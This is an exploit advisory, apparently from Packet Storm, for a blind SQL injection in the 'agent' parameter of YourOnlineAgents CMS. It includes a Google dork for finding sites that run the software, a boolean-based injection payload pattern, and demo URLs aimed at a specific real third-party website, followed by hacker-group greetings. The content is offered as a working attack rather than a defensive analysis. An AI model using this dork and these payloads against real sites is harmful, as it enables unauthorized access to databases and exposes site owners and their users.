YourOnlineAgents CMS suffers from a remote blind SQL injection vulnerability.
6e4aaf2fcf81a9aefc84e43c1f9c90e1b7bfd1cc5114b7b861c96dc50dc8a7e9#######################################################
# #
# ________ .__ __________________ #
# \_ ___ \_______|__| _____ \_____ \______ \ #
# / \ \/\_ __ \ |/ \ _(__ <| _/ #
# \ \____| | \/ | Y Y \/ \ | \ #
# \______ /|__| |__|__|_| /______ /____|_ / #
# \/ \/ \/ \/ #
# #
#######################################################
#
#
# Exploit Title: YourOnlineAgents CMS Blind Sql Injection Vulnerability
#
# Google Dork: Intext:"Powered by YourOnlineAgents.com"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Vendor Home : http://www.isolutiononline.com/
#
# Tested on: all
#
==================================
agent parametr is Vulnerable to Blind Sql Injction
test for BSqli foundlistings.php?agent=[id]+and+Something=Something-- and page loads normally ;)
D3M0 :
http://www.cbn.on.ca/foundlistings.php?agent=6219+and+1=1--
http://www.cbn.on.ca/foundlistings.php?agent=6219+and+1=2--
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook -
S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed